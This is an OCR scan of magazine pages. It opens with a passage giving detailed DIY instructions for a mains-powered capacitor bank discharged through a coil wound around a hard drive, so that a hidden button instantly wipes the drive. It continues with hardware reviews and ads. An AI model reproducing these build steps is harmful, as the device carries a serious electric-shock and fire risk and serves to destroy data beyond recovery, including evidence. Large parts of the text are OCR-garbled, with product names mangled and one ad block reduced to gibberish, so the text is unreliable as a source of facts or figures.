наматывается проволока. Его легко заменить 




конденсаторной батареи и повторил все действия. Опять 
хлопок, вспышкаи приятное ощущение, когда винчестер 
не определился в биосе :). 

Это были вводные эксперименты. Сейчас настало время 
сделать полноценный хакерский девайс, который можно 
стационарно установить в компьютер и который, при жест- 
кой необходимости, убьет напрочь твой хард. 

Крутой девайс 

Для создания нашего мегадевайса нам потребуется 
корпус от съемных хардов( тоЬіІе гаек или любой дру- 
гой корпус, устанавливаемый в 5” отсек), пластмассовая 
коробочка отжестких дисков, 5 метров витой пары, горе- 
лый БП и корпус от него, несколько электролитических 
конденсаторов, рабочий БП и сам комп с хардом. 

Для начала кладем винт в коробочку и отрезаем торец 



этой коробочки, чтобы можно было подключить питание 
и шлейф. Затем обрезаем торчащие элементы, чтобы он 
хорошо и свободно помещался в 5” корпус. 

После этого нужно подготовить провод. Удобно это де- 
лать в коридоре, где его можно вытянуть на всю длину. 
Сначала снимаем внешнюю изоляцию кабеля и достаем 
оттуда 4 витых пары. Дальше — интереснее. Теперь надо 
каждую витую пару развить. Один конец пары вставляем 
в реверсивную дрель, другой конец можно отдать при- 
ятелю. Далее включаем дрель и разматываем (против ча- 
совой стрелки!) витую пару. Делать это надо аккуратно 
и внимательно; у нас на этот процесс ушел где-то час. 
Удобно делать втроем. Один держит дрель, второй — 
противоположный конец, а третий следит за размоткой 
и помогает развиться паре. После того как ты размотал 
витуху, у тебя будет 8 проводов — каждый по 5 метров 
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ІСТАНОВИТЕЛЕЙІ 



Надо сказать, мы 
очень лихо решили, 
что информация на 
жестких дисках дейс- 
твительно уничтожи- 
лась. Мы лишь зафик- 
сировали тот факт, что 
винчестеры вышли из 
строя, испортились. С 
вопросом, можно ли 
восстановить с них ка- 
кую-то информацию, 
мы обратились к вос- 
становителям данных, 
и они нам ответили, 
что на этих винчесте- 
рах нет и намека на 
некогда присутству- 
ющую информацию. 
Сплошной трэш из 
случайных неупорядо- 
ченных чисел. 



# 

% 



длиной. Скрути их концы в один 40-метровый кабель, обя- 
зательно заизолировав места скрутки. 

Наматываем 40 метров 

После этого, виток к витку, наматываем провод на ко- 
робку, внутри которой лежит винчестер. Когда весь ка- 
бель будет намотан на винчестер, нужно уложить его в 
5-дюймовый бокс таким образом, чтобы он туда хорошо 
поместился, и ничего неторчало. Из бокса выводим ЮЕ- 
шлейф, кабель питания и два конца обмотки для под- 
ключения к конденсаторам. 

Теперь займемся блоком выпрямителя и батареей кон- 
денсаторов. Удобно все это добро разместить в корпусе 
от блока питания. Для этих целей я взял кусок от платы 
сгоревшего БП, оставив только блок выпрямителей и 
конденсаторы. В старых совковых теликах конденса- 
торы монтировались на шасси, под гайку. Само шасси 
было «-», а центральный электрод — « + ». Учитывай это. 
Спаиваем вместе все конденсаторы, строго соблюдая 
полярность. Я оставил кусок шасси и просто подпаял 



первые испытания. На АТХ-разъеме БП перемыкаем 
зеленый и черный провод, чтобы он мог включить- 
ся без «мамки». В принципе, можно подрубить его к 
«мамке» и включить через нее, но это не спортивно. 
Смотрим, чтобы провода от конденсаторов не пере- 
мыкались, и щелкаем тумблером, подавая питание в 
цепи адской машины. Здесь будь очень внимателен, 
смотри, чтобы никто не касался проводов, и ничего 
их не замыкало. Автора статьи именно на этом этапе 
хорошенько дернуло током. Если кулер закрутился, 
и ничего не сгорело, не взорвалось, не задымилось 
— уже неплохо. Затем отключаем питание, и очень 
аккуратно, на вытянутых руках, перемыкаем провод- 
ки, разряжая конденсаторы. Должна сверкнуть яр- 
кая искра, потом раздастся хлопок. Импульс тока на- 
столько сильный, что если замкнуть эти два контакта 
тонким проводом, то он превратится в пар, красиво 
разбрызгивая металл. 

Если вся операция прошла нормально, и все ос- 
тались живы, а главное, ты увидел столь чудесный 



использование КОНДЕНСАТОРОВ: НЕ ЗАБЫВАЙ, ЧТО НАПРЯЖЕНИЕ, НА КОТОРОЕ 
РАССЧИТАНЫ КОНДЕНСАТОРЫ, ДОЛЖНО БЫТЬ НЕ МЕНЬШЕ 400 ВОЛЬТ. ЕСЛИ 
ОНО МЕНЬШЕ, ТО ИХ НУЖНО СТАВИТЬ ПОСЛЕДОВАТЕЛЬНО. НАПРИМЕР, ЕСЛИ ТЫ 
ВЫТАЩИЛ ИХ СТАРОГО ТЕЛЕКА ЭЛЕКТРОЛИТЫ ПО 50 ВОЛЬТ НА 1000 МКФ, ТО ИХ 
НУЖНО СОЕДИНИТЬ С БАТАРЕЕЙ ИЗ 8 ШТУК, СТРОГО СОБЛЮДАЯ ПОЛЯРНОСТЬ 
(КАК БАТАРЕЙКИ В ПЛЕЕРЕ). СУММАРНАЯ ЕМКОСТЬ ЭТИХ 50-ВОЛ ЬТОВЫХ БУДЕТ 
1000/8 =125 МКФ. БЕРИ ДЛЯ ПОСЛЕДОВАТЕЛЬНОГО СОЕДИНЕНИЯ ТОЛЬКО ОДИ- 
НАКОВЫЕ КОНДЕНСАТОРЫ. ЕСЛИ БУДУТ РАЗНЫЕ КОНДЕРЫ, ТО ИХ СУММАРНАЯ 
ЕМКОСТЬ ОПРЕДЕЛЯЕТСЯ ПО ФОРМУЛЕ, КОТОРУЮ МОЖНО НАЙТИ В ШКОЛЬНОМ 



УЧЕБНИКЕ ФИЗИКИ. 

к нему «-». Далее закрепляем все это дело в корпусе 
от БП. Оставшийся кусок платы я поставил на штатные 
места, предварительно подпаяв два провода на « + » и 
«-», заведя их на конденсаторы и провода питания, ко- 
торые пойдут в сеть 220 вольт. Блок совковых конденса- 
торов нельзя просто так бросить в корпус БП — на кор- 
пусе будет нефиговый потенциал, и тебя просто крепко 
дернет током. Так что при закреплении в металлическом 
корпусе необходимо изолировать их от стенок — обмо- 
тать их изолентой. 

Далее из корпуса выводим две пары проводов: одна 
пара — сетевые проводана220 вольт, вторая пара — на 
дроссель жесткого диска. Аккуратно закрываем кон- 
денсаторно-выпрямительный блок, следя затем, чтобы 
кондеры и разные контакты не касались корпуса. Лучше 
все оголенные провода заизолировать, а то лужа рас- 
плавленного металла на полу, которая когда-то была 
твоим компом, вряд ли кого-то обрадует :). 

Затем разбираем рабочий БП, который и будет питать 
весь комп, и припаиваем сетевое питание нашего девай- 
са. Рекомендую подпаиваться к тумблеру, откуда идет 
провод на плату штатного БП, чтобы можно было легко 
обесточивать вместе с компом и наш девайс. Удобно в 
корпусе штатного БП выломать несколько прутиков из 
решетки и провести таким образом в корпус БП провод. 
Завинчиваем корпус штатного БП и уже можем провести 



фейерверк, то можно переходить к заключительно- 
му этапу — подключению кнопки и монтажу в ком- 
пьютерном корпусе. Устанавливаем штатный БП. 
Затем берем заранее подготовленную красную 
кнопку. Смотрим, чтобы кнопка была рассчитана на 
большое напряжение, и ее контакт был нормально 
разомкнут (то есть, когда она не нажата, ток через 
нее не течет). Я ее подключал к выносной в отде- 
льном корпусе, изготовленном из порядком изнаси- 
лованного, и так уже дохлого БП :). Подключив один 
контакт батареи конденсаторов напрямую к обмотке 
на харде, я хорошенько все заизолировал. Второй 
контакт подключаем к проводу, идущему на кнопку, 
затем второй провод подключаем к второму концу 
обмотки харда. Удобно пропустить все провода, иду- 
щие к харду, сразу через пятидюймовый отсек, пос- 
кольку снаружи удобнее монтировать. 

Завершение 

На этом этапе, собственно, у тебя есть работающий 
компьютер — жесткий диск определяется, система 
загружается. Ноутвоего компаесть секрет: жесткий 
диск обмотан шахидской намоткой из медного про- 
вода, и стоиттебе нажать на красную кнопку, как вся 
информация на винчестере мгновенно исчезнет. ік 
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ВСЕ ВОЗМОЖНОСТИ 
ДЛЯ ОТДЫХА „ 

И РАЗВЛЕЧЕНИИ 



Используя новейший двухъядерный процессор Іпіеі® Репііит® й 
Персональный компьютер ФРОНТ Т-90 (404) предоставляет Вам больше 
вычислительных ресурсов, позволяя по-настоящему насладиться всеми 
достижениями новейших мультимедиа-программ. 




Репііит' Р 

іпзісіе™ 



ОиаІ-соге. 
Оо тоге. 





ФР <г МТ 

ѵѵѵѵѵѵ.ігопірс.ги 
+ 7 ( 495 ) 234-9049 



Т6ХНОПОГИЯ 

ПОБЕОЫ 



Обозначения ВиппуРеорІе, Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, логотип Сепігіпо, СЫрз, Соге Іпзісіе, Ріаіодіс, ЕІЬегЕхргезз, ЕТОХ, РІазЬРІІе, І386, І486, І960, ІСОМР, ІпзіапіІР, Іпіеі, логотип Іпіеі, ІпіеІ386, ІпіеІ486, ІпіеІ740, ІпіеЮХ2, ІпіеЮХ4, ІпіеІ5Х2, Іпіеі Соге, Іпіеі Іпзісіе, 
логотип Іпіеі Іпзісіе, Іпіеі. Ьеар аііеасі., логотип Іпіеі. Ьеар аНеасІ., Іпіеі МеіВигзі, Іпіеі ІЧеіМегде, Іпіеі ЫеіЗігисіиге, Іпіеі ЗіпдІеОгіѵег, Іпіеі ЗреесіЗіер, Іпіеі ЗігаіаРІазЬ, Іпіеі Ѵііѵ, Іпіеі ХЗсаІе, ІРЬіпк, Ііапіит, Ііапіит Іпзісіе, МСЗ, ММХ, логотип ММХ, логотип Оріітігег, 
ОѵегОгіѵе, Рагадоп, РОСЬагт, Репііит, Репііит II Хеоп, Репііит III Хеоп, Регіогтапсе аі Ѵоиг Соттапб, Репііит Іпзісіе, зкоооі, ЗоипР Магк, ТЬе Сотриіег Іпзісіе., ТЬе Зоигпеу Іпзісіе, ѴТипе, Хеоп и Хеоп Іпзісіе являются товарными знаками, либо зарегистрированными 
товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. 




Реггит / 02 





СЕРГЕЙ НИКИТИН , ДМИТРИЙ ОКУНЕВ, ТЕ5Т_І_АВ 

/ТЕ5ТІ_АВ@САМЕІ.ДЫ0.КІІ / 




Как показали тесты 



система КІТ Ѳатег 



450Х на все сто процен- 



тов оправдывает свое 



название! 
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КІТ Ѳатег450Х 

Разгонное тестирование геймерского компа от компании КИТ 



Г 



Технические характеристики 

Процессор, ГГц: 3.4, Іпіеі Репііит О 950 
Память, Гб: 4, ООВ2-533 Кіпдзіоп ОиаІ 
СЬаппеІ 

Системная плата: АЗІІЗ Р5Ѵ\Ю2 Ргетіит 



'Ч 



(ІпіеІ І995Х) 

Видеоплата, Мб: 512, ЗаррЫге АТІ Рабеоп 
Х1900ХТ 



Жесткий диск, Гб: 2x400, Зеадаіе 

Ваггасиба 

Аудиоплата: ВеаІІек АЮ882Ю/М, ІпіеІ 
82801 (ЗВ ІСН7, НідЬ Оеііпіііоп Аибіо 
Сетевая плата: 2хОідаЬіІ І_АІЧ 
Оптический накопитель: ОѴО+ѴВѴѴ ЫЕС 



N0-4571 А 



ѵ: 



Дополнительно: кардридер 5-іп-1, 2 вен- 
тилятора на корпусе, замок, безвинтовая 
сборка-разборка и установка устройств. 



У 



Собрать мощный компьютер, который мог бы 
выполнять абсолютно любые задачи, и при 
этом позволял бы гонять в самые современные 
игры — мечта каждого. Но тут сразу возникает 
масса проблем . В основном это выбор подходя- 
щих комплектующих. На рынке масса новинок, 
устройства устаревают быстрее, чем ты успе- 
ваешь накопить деньги. Поэтому пока ты оп- 
ределялся с выбором, например, процессора, 
на прилавках появилось три новых, а еще пять 
обещают выпустить в ближайшие дни. Что же 
делать? Отказаться от своей идеи? Конечно же, 
нет! Просто нужно часть проблем переложить 
на чужие плечи. То есть приобрести готовый 
ПК самой мощной конфигурации, что-то в ней 
незначительно изменив. Голова пусть болит у 
сборщиков, а ты просто будешь наслаждаться 
приобретением. Компьютер КІТ (Затег 450Х 
обладает современнейшей начинкой, которая 
предоставит тебе неограниченные возможнос- 
ти в играх и других приложениях. 

Методика тестирования 

Подключив системный блок и установив все 
необходимые драйвера, мы стали вниматель- 
но изучать систему. Во-первых, это визуальный 
осмотр корпуса и его внутренностей: как соб- 
ран, много ли свободного места, что установ- 
лено, есть ли разные дополнительные вещи, 
вроде вентиляторов и безвинтовых креплений. 
Второй этап гораздо серьезнее — это тести- 
рование на производительность. В качестве 
тестовых приложений мы использовали синте- 
тические тесты компании Риіигетагк: ЗОМагк 
2003, ЗОМагк 2005, ЗОМагк 2006 (в основном 
нагружают графическую подсистему) и РСМагк 
2005 (комплексный тест всего ПК) — они запус- 
калисьс «дефолтными» настройками качества. 
Кроме того, использовались игры Ооот 3, Раг 
Сгу, Р.Е.А.В. и НаІМіІе 2, которые прогонялись 
в довольно тяжелом режиме — максималь- 
ные графические настройки и разрешение 
1600x1200. 

Но и на этом мы не остановились. По оконча- 
нии тестирования был проведен комплексный 




Внутреннее убранство корпуса: кабели аккуратно свернуты, уст- 



ройства устанавливаются без помощи винтов и отвертки 



разгон системы: процессор с 3,4 ГГц был «ус- 
корен» до 4,08 ГГ ц (Р5В 240 МГ ц), память при 
этом успешно работала в режиме ООВбОО. У 
видеокарты частоты были повышены с 500 до 
570 МГц для ОРІІ и с 595 до 71 1 МГ ц для памяти. 
Естественно, для осуществления задумки при- 
шлось немного поднять напряжения питания: 
для чипа на видеокарте оно составило 1,250 
вместо 1 , 1 75 В, для процессора — 1 ,45 В против 
дефолтных 1 ,33 В. 

Результаты тестов 

ЗОМагк'ОЗ, баллы: 18175 
ЗОМагк'05, баллы: 9416 
ЗОМагк'Об, баллы: 5583 
РСМагк'05, баллы: 5926 
Ооот 3, РРЗ: 89.2 



Зегіоиз Зат 2, РРЗ: 1 1 8.9 
НаІІ-ЫІе 2, РРЗ: 143.09 
ѴѴІпРАР, КЬрз: 552 
ѴѴІпРАР МиІІіІЬгеасІесІ, КЬрз: 873 
І_ате, сек: 17 

Процессор 

Созданный по 65 нм технологии, двуядерный 
ІпіеІ Репііит О 950 для разъема І_(ЗА775 обла- 
дает ярко выраженной силой. На каждом из его 
горячих и быстрых сердец расположено по 2 Мб 
кэш-памяти второго уровня, тактовая частота 
составляет 3,4 ГГ ц, а шины — 800 МГ ц. Кроме 
того, он поддерживает такие фирменные раз- 
работки ІпіеІ, как виртуализация, ЕпЬапсесІ 
ЗреесІЗіер, ЕМ64Т и Ехесиіе ОізаЫе.ВіІ. 
Память 

Памяти тут целых 4 Гб ООВ2-533, установлена 



Раг Сгу, РРЗ: 138.2 
Зегіоиз Зат 2, РРЗ: 1 02 
НаІІ-ЫІе 2, РРЗ: 133.57 
ѴѴІпРАР, КЬрз: 534 
ѴѴІпРАР МиІІіІЬгеасІесІ, КЬрз: 820 
І_ате, сек: 21 

Результаты тестов (ра: 

ЗОМагк'ОЗ, баллы: 18539 
ЗОМагк'05, баллы: 10402 
ЗОМагк'Об, баллы: 5738 
РСМагк'05, баллы: 6744 
Ооот 3, РРЗ: 93.2 
Раг Сгу, РРЗ: 151.56 
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и массу фирменных решений и технологий АЗІІ8, которые 
применены в устройстве: они сделают использование платы 
более быстрым, надежным и удобным. Среди них каждый най- 
дет для себя что-то полезное — и оверклокер, и начинающий 
пользователь. 



Накопители 

Да, о таком раньше можно было только мечтать — два жест- 
ких диска Зеадаіе Ваггасиба объемом 400 Гб, объединенные 
в ЯАЮ-массив. Теперь проблема свободного места отпадает 



она в четырех гнездах (работает в двухканальном режиме). Такого коли- 
чества быстрой ОЗУ хватит для выполнения любых задач, что в сочета- 
нии с мощью других комплектующих обеспечит тебе долгое отсутствие 
необходимости проведения модернизации. 

Видеоплата 

Монструозное устройство от компании ЗаррЫге, в конструкции которого 
использованы чип АТІ Васіеоп Х1900ХТ и 512 Мб быстрой памяти ООВЗ. 
Помимо скорости работы, велики и габариты платы: она очень длинная, 
а массивная система охлаждения занимает два слота на матери. Также 
ей требуется дополнительное питание. Впрочем, все эти особенности, 
благодаря хорошему корпусу и мощному БП, никак не осложнят жизнь 
пользователю. А вот результаты тестов его наверняка впечатлят, осо- 
бенно малое падение производительности при включении режимов АА 
и АР (это тяжелые режимы, которые значительно повышают реалистич- 
ность). А благодаря возможности повышения напряжения питания чипаи 
памяти с помощью софта девайс имеет немалый разгонный потенциал! 

Системная плата 

На плате АЗІІЗ Р5Ѵ\Ю2 Ргетіит имеется абсолютно все. Это и двухка- 
нальный режим работы памяти ОЭР12, и технология АТІ СгоззРіге — так 
что о скорости работы системы думать не приходится. Крометого, имеет- 
ся контроллер ЗАТА-2 вместе с возможностью создания ВАЮ-массивов, 
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' Ог крой і.чф 3 й: ес На и риак пе шиы 




ЧРЕЗМЕРНОЕ ПОТРЕБЛЕНИЕ 
ПИВА ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ 






74 



I 






начисто! Благодаря фирменным технологиям А81ІЗ обеспечивается бе- 
зопасность информации, а интерфейс 8АТА-2 отвечает за скоростную 
работу дисковой подсистемы. Оптическим приводом здесь является 
универсальный ОѴЭ-накопитель, который умеет читать и записывать 
любые форматы болванок, включая двухслойные. Не стоит забывать и о 
такой приятной вещи, как пятиформатный кардридер. 



Аудиоплата 

Звуковая подсистема устройства представлена встроенным в систем- 
ную плату 7.1 кодеком. Конечно, это не студийное оборудование, но для 
домашнего использования он вполне сгодится. Кроме того, удобство ис- 
пользования: штекер можно вставить в любой разъем, а настроить все 
соответствующим образом позволит специальная утилита. Сделать это 
легко — графический интерфейс прост и понятен. 

Блок питания 

Мощному компу — мощный БП! В данном устройстве установлен 460 
Вт блок питания производства компании РЗР, который стабильно запи- 
тывает весь компьютер, включая сильную видеоплату, нуждающуюся в 
дополнительном источнике энергии. Благо ее тут хватает, а обширный 
пучок проводов, где есть все необходимые разъемы, позволяет обойтись 
без переходников. 



Корпус 

Внутреннее убранство корпуса: кабели аккуратно свернуты, устройства 
устанавливаются без помощи винтов и отвертки. Спереди и сзади уста- 
новлены дополнительные вентиляторы, атепло от процессора выводит- 
ся наружу через специальный раструб на боковой стенке. На переднюю 
панель выведены порты ІІЗВ, РігеѴѴіге и аудиоразъемы, а также кардри- 
дер. Кроме того, корпус сам по себе довольно симпатичный: выкрашен 
в черный и серый цвета. 




На переднюю панель выведены порты ІІЗВ, 
РігеѴѴіге и аудиоразъемы, а также кардридер. 



Выводы 

Как показали тесты, система КІТ Оатег 450Х на все сто процентов 
оправдывает свое название. Благодаря мощным компонентам она легко 
справляется как с самыми современными сложными играми, так и с 
большинством современных приложений. Еще один плюс — неплохой 
оверкпокерский потенциал данной машины, обусловленный хорошо раз- 
гоняемым процессором и видеокартой, снабженной качественным куле- 
ром. В общем, если ты увлекаешься современными «стрелялками» и не 
представляешь себе, как можно опускать планку качества изображения 
ниже максимальной, то данная «тачка» как раз для тебя. □с 
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высокой четкости 



Поддержка технологии НеІ® Сепігіпо® Пчо для мобильных ПК Вашего Ргояідіо 
Ѵі^сопіо 1 300 замечательные визуальные возможности для игр, просмотра видео, 
цифровых фотографий и для МНОГОГО Другого- 




Ноутбук 

Ргезіідіо Ѵівсопіе 1300 



с функцией Роѵѵег Сіпета 



Максимум нпімжнкт^й, максимум мобильности 



■ Технологий ІпійФСепіплоѳОио для моОнпьмыхПК 

■ Высекал п{юиз№дитопьнооіь 

■ Функция Роѵч'Си Стета - смотрите фильмы, не за* ружая 
операционную систему • экономьте заряд батареи! 

■ Вес 2 кг и небольшой размер дарят вам настоящую 

МОБИЛЬНОСТЬ 



3 года мввдунгродной гарттнн 



Спк№ ли к роя 

і Кисцшиш Лион і№- - Ь-ІЛМѴ, г. К|ікі*ияір ' і'Ъкі ' - ;аЬіТ|7.1 *4-'.Н| г Лі-лі» -ь :н» *л- ?МЮ-*! Ш-ОЙ НТ П-1 ІИ, ТТ-И-Ш. г. ІЬіѵчв ТѴКмЛ ■ ЦЮйХЛМЧЭ 
Г.РМкл Щ» Дйит 0*Ш* - ,8ЙЭ| 2» М м І.СКнгГ «1п«ц«*01 ■Ьычкигда-Щ*!* -КЕЙ- 1В12эЛ!Ч. «Э*>, :* ■ .»> 7 іЯ»» і,, .^.цы *,,» ,* И* Г(яГг •• О® «■?• 

7 Я 27 И 7 . тц-л т.- 1 (Д(*|гтС««» ЬУЧШгРОО г*« 2 іИ 1 -л V. -№*і С ягйчілЛі- ■ :В»І М 5 У? К. г, Скличцмо»" <КЭЬ' 2 Э'ТІ'ПІ Гйт Яііг. - і[щха д:і 

г Сірр МГКЧЧ- ТІПЫГ-- ■ |П4.- ГѴ77И г Тѵ іиргѵ МП г, Кэъонь Гіт ■ ■ н+ыт- . р-:Ші Ж*> >> фодг Днжгг.-к- 'НСч йЖі-ЧаР-ЬЛ-. Тг ■ Імчтрг*--_-і 

«П—- «О - ЯИП °Мг & Г, г, Иронии» Епіаг - МВД Ч-» Л. г. Шщтшж <І» Х*+#НЪ Н№ ■ ЙТ-ЛН, ДО-Ю. Ы Г-* ж. Н ЖѴН № Ч я:ж СЮО 1№»1 
ілп>-гжіка-м4іч.-ма.!(й-іш Тйнй-даі аи-ама ткі« іьт 1 івдакдь-» т емп щй- 

ІК.»-ВН.Г. Блпсч АліЛ-ивмжчіпі Сліѣ > рчѴЬяіЧімі ННіМяа Ж'іфигия-. іГАЫі 5+іЕМГ Ы « ОО Я Н 44 



№ ** і цл ч г г-. щгз і-ш Ицрокі 
4дсі.ии *#л імн д-7-п.-и.іьл груі нл ні ип і ь 



ікк. с.нл 



РЕКЛАМА 





1ез1_ІаЬ выражает благодарность за предоставленное на тес- 
тирование оборудование компаниям: Ыеѵасіа (т.(495) 1 01 -281 9, 
ѵѵѵѵѵѵ.пеѵ асіа.ш), МЕВЫОЫ (ѵѵѵѵѵѵ.тегііоп.ги), Бюрократ (т.(495) 
745-551 1 , ѵѵѵѵѵѵ. Ьиго.ги), российским представительствам ком- 
паний І_еасІІек, РоѵѵегСоІог, Р5Р, Ыеоѵо, а также европейскому 
представительству компании НІ5. 




* основных причин, почему они попали в этот обзор 





Дѳвайс поддерживает стан- 
дарт АОЗІ_2+, что поднимает 
верхнюю скоростную планку 
вдвое. Качать — не перека- 
чать :). 



Асогр АО$Ь Коиіег І.АІІ120 

Модель: АО5І_І_АІ\І120 



Стандарты: 

Разъемы: 

Индикаторы: 

Дополнительные возможности: 
Цена: 



ІЕЕЕ 802.3, ІЕЕЕ 802.3и, Ѳ.сіті, Ѳ.іііе, АЭЗІ-2, А051.2+, ВЕС 
1483/2684, ВЕС 2364 РРРоА, ВЕС 2516 РРРоЕ, Ц5В 1.1 

АР5І-, 1)5В, ЬАІЧ, Роѵѵег 

Роѵѵег, ЬАІЧ, 115В, АРЗЬ 

возможность подключения по Ц8В 

$35 




Модем можно подключать как 
по 115В, так и к сети ЕФегпеІ. 
Сможет работать роутером 
в твоей локалке, или давать 
интернет только тебе одному 
— как захочешь. 




Функция ІР ОоЗ предостав- 
ляет пользователю возмож- 
ность настроить приоритеза- 
цию трафика на восходящем 
канале. 



Присутсвуют здесь и все 
стандартные функции ро- 
утера: ЫАТ/ЫАРТ, Раскеі 

РіІІегіпд, Зіаііс Воиііпд, 
ОНСР.. 




Менеджер РРРоЕ-соедине- 
ний позволяет создать не- 
сколько профилей настроек. 
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В соотношении цена/функци- 
ональность модем весьма уве- 
ренно может конкурировать 
с аналогичными моделями, 
представленными на рынке. 
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Внутренняя начинка и интер- 
фейс настройки являются 
клонами модемов Рагабупе и 
А51ІЗ. 




У лобная и тонкая клавиатура с массой необ 
свойств 



Сепіиз 81іт81аг 310 

Интерфейс: РЗ/2 



Дополнительные клавиши, шт: 14 



Особенности: 



Органы управления: водонепроницаемость, антибактериальное покрытие, 

увеличенный размер клавиш 



1 

4 



Ѳепіиз ЗІітЗіаг 31 0 облада- 
еттонким (зііт) дизайном, 
что вкупе с двухцветной 
раскраской корпуса придает 
ей стильный и современный 
внешний вид. 



Клавиши имеют стандарт- 
ное расположение, так что 
тебе не придется переучи- 
ваться. 



2 
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Размер клавиш несколько 
увеличен по сравнению со 
стандартными, а их ход ко- 
роткок и мягок. Одним словом 
— удобно. 



Водонепроницаемость. 
Теперь можно не опасаться 
пролитых на устройство 
капель кофе. 



з 



Имеются 14 дополнительных 
клавиш. Они разделены натри 
группы: интернет, быстрые 
клавиши для вызова программ 
и кнопки управления проигры- 
вателем. 
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Чистота клавитатуры гаран- 
тирована антибактериальным 
покрытием, нанесенным на 
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Окііск 323 М МКІ. 



Скорость считывания, Гц: 


1500 


Разрешение оптического сенсора, сірі: 


800 


Длина провода, м: 


1,5 


Органы управления: 


две кнопки, колесико прокрутки 


Дополнительные возможности: 


возможность подключения по ЦЗВ 


Интерфейс: 


ІІЗВ, Р5\2 



Красивая и ѵпобная мышь, работающая 
на любых поверхностях 



з 



Оптический сенсор имеет р; 
решение 800 фі, а технологи? 
зеркально отражения МВ1_ 
ТесИпоІоду позволяет изде- 
лию работать практически на 
любой поверхности. 
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Колесо прокрутки может быть 
настроено как на вертикаль- 
ный, так и на горизонтальный 
скроллинг. 



і 

4 
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Корпус мыши имеет сов- 
ременный дизайн и покрыт 
черной и серебряной 
краской, так что устройство 
украсит любой рабочий 
стол. 



Кнопок как таковых у Окііск 
323 М МР?І_ нету: они слива- 
ются с корпусом. Выгладит 
прикольно и необычно. 



2 
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Мышь выпускается в самых 
разных цветовых вариантов 
-ты можешь найти розовый, 
чтобы подарить девушке, или 
кислотно-зеленый для друга- 
наркомана. 



У мыши длинный провод, 
поэтому ты без проблем ее 
подключишь к системнику 
под столом. Она сама по себе 
небольшого размера - можно 
таскать вместе с ноутом. 

Колесико прокрутки распо- 
ложено в специальном паль- 
цевом канале (это добавляет 
удобства в использовании 
мыши). 




Кѵлео. который оазоаба тывался вместе 
с известным геймером ГаіаН іѵ 




Сердечник кулера окружают 
два типа ребер — большие и 
малые (чтобы умещались по 
ширине платы). 



2аІтап ГаіаН іу Г5-Ѵ7 



Подшипник: 2 шарикоподшипниковых набора 



Размеры вентилятора: 


80(длина) х 80(ширина) х 15 (высота) мм 


Габариты устройства: 


91 (длина) х 126,4(ширина) х ЗО(высота) мм 


Частота памяти: 


800 МГц 


Скорость вентилятора: 


2050грт — 3500грт 


Уровень шума: 


23,7 дБ — 36 дБ 


Базовый материал: 


Медь (Си) 


Вес: 


270 г 


Цена: 


$50 




Традиционные пластинчатые 
ребра, применяемые инжене- 
рами 2аІтап, в данном случае 
претерпели некоторые 
изменения для улучшения 
теплоотвода. 



Кулер ставится очень 
просто: он плотно прижи- 
мается к чипу с помощью 
винтов и алюминиевой 
перекладины, фиксируясь 
на двух точках. 




При покупке самого кулера 
счастливчик получает набор 
миниатюрных радиаторов 
для памяти бордового цвета, 
мануал, термопасту, а также 
специальные крепления. 



Чтобы радиатор отводил 
больше тепла, его подошву 
отшлифовали по специаль- 
ной технологии. 
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Использование нового кулера 
позволяет снизить температуру 
графического чипа в среднем 
на 25-30% по соотношению к 
номиналу. 



7 



Этот пропеллер хоть и разра- 
батывался с учетом пожеланий 
геймера Раіаі 1 1у, но тесты пока- 
зали, что для последних поколе- 
ний видеокартон слабоват. 
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Вентилятор использует 
целых два шарикоподшип- 
никовых набора, благодаря 
чему работает негромко, а 
ресурса надежности хватит 
надолго. 



Кулер очень прикольно выгля- 
дит и может стать украшением 
моддерского корпуса. Его 
будет прикольно разглядывать 
через вырез в системнике :). 
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РЕПШЗМ 



АС пеоѵо Р-1 7 

Разрешение: 


1 280 х 1024 


Диагональ, дюймов: 


17 


Яркость, кд/см л 2: 


300 


Контрастность: 


500:1 


Латентность матрицы, мс: 


8 


Углы обзора (горизонтальные/вертикальные, 


град): 140/130 


Колонки: 


2 + 1 (сабвуфер) 


Интерфейсы: 


О-ЗІІВ, ОѴІ-О, 3-ѴЮЕО, ВСА, Заек, 
4x115В. 


Вес, кг: 


6,8 


Цена, $: 


495 




Мультимедийный монитор, оснащенный 
всем необходимым лля работы и развле- 
чений. 




Сразу бросается в глаза 
массивная станина с выпи- 
рающей передней частью, в 
которой находятся динамики. 



Матрица снабжена защит- 
ным покрытием, которое 
сильно бликует. 



Есть встроенный ІІЗВ-кон- 
центратор, разъемы которого 
расположены по два с каждо- 
го торцов корпуса. 



2 
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Хорошее качество звука 
— отлично прослушиваются 
высокие и низкие частоты, 
не слышно дребезжания при 
большой громкости. 



Оригинальная конструкция 
меню: кнопки расположены 
на передней панели, при этом 
они никак не подписаны, но 
при запуске настроек все 
сразу становится понятным. 



з 



Яркости и контрастности хвата- 
ет для любого вида деятельнос- 
ти, время отклика пикселей сов- 
сем невысокое — движущиеся 
объекты почти не размываются. 
Углы обзора также не вызывают 
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Большое количество различ- 
ных интерфейсов. Помимо 
стандартных ОѴІ-О и О-ЗІІВ 
имеются также 3-ѴЮЕО и ВСА 
для подключения видеотехники. 




МісІсІІе-епсІ ускоритель с чипом из послед- 
ней линейки МѴЮІА и отличным соотноше- 
нием иена/ка чество 



І-еасІІек СеРогсе 7600СТ 



Технология: 90 нм 



Объем памяти: 


256 МБ ОООВЗ 


Частота ядра: 


560 МГц 


Частота памяти: 


700 МГц (ООВ1400) 


Число пиксельных конвейеров: 


12 


Число вершинных конвейеров: 


5 


Число ПОР: 


8 


Число ТМІІ: 


12 


Версия пиксельных/вершинных шейдеров: 


3.0 


Интерфейс: 


РСІ-Ехргезз 16х 


Цена: 


$200 




На плате распаяны чипы па- 
мяти производства Затзипд; 
время выборки 1 ,2 нс, что 
соответствует частоте 800 
МГц(ООРМбОО) 




Используется модернизиро- 
ванная система охлаждения 
с радиатором и диаметром 
крыльчатки большего раз- 
мера. 




В комплекте поставляются 
4 диска, на которых, помимо 
драйверов, находятся две пол 
ноценные игры: Зегіоиз Зат 2 
ТгасктапіаЫаііопз. 





По скорости в игровых бенч- 
марках карта стоит на одном 
уровне со своим главным 
конкурентом Вабеоп XI 800 
ОТО. 




Ввиду более низкой цены, 
чем у конкурирующих ус- 
корителей, в соотношении 
цена/производительность 
ОеРогсе 76000Т выглядит 
очень привлекательно. 
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Отрицательным фактором 
является то, что радиатор не 
охлаждает чипы памяти, и таким 
образом снижается вероят- 
ность ее успешного разгона. 



034 



ХАКЕР 07 /91/ 06 








